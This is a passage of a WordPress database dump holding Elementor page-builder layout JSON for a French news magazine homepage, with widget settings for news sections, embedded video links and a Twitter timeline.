":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"orderby\":\"meta_value\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2296,745,'_elementor_version','0.4'),(2297,745,'_elementor_css','a:3:{s:4:\"time\";i:1509369305;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2299,746,'_elementor_edit_mode','builder'),(2300,746,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_ico